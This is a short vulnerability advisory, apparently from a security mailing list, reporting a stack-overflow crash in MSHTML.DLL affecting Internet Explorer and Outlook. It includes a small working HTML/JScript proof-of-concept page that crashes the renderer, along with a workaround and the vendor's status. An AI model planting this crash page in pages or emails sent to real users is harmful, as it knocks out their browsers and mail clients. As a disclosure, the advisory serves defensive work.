Stack Overflow in MSHTML.DLL Systems affected: Any program using MSHTML.DLL for HTML parsing (Internet Explorer, Outlook/Outlook Express and other HTML-enabled emailreaders). Reliably tested on IE4.0 and higher on any Windows system, with any servicepacks and patches. Older versions of MSHTML.DLL may be affected too, but remains untested. Risk: Low/Medium Description: MSHTML.DLL crashes with a Stack Overflow from simple scripting. Details: The bug is only experienced when dealing with multiple window objects, where one is receiving data. To reproduce the bug, create a JScript object, set a property on the object from the window object receiving data, delete the object and create it again. No exploitable buffer overflows have been found so far. Code: ------------InstantCrash.html----------------- <iframe id=test style="display:none"></iframe> <script> Larholm = {}; // Object literal test.document.open(); // Stream data test.document.write("<s"+"cript>top.Larholm.test=0</s"+"cript>"); delete Larholm; Larholm = {}; // Crash </script> ---------------------------------------------- Workaround: Disable Active Scripting. Vendor status: Microsoft was contacted on 4 December 2000. Bug is considered to be a code quality bug, and will be adressed in a future SP for IE. -- Thor Larholm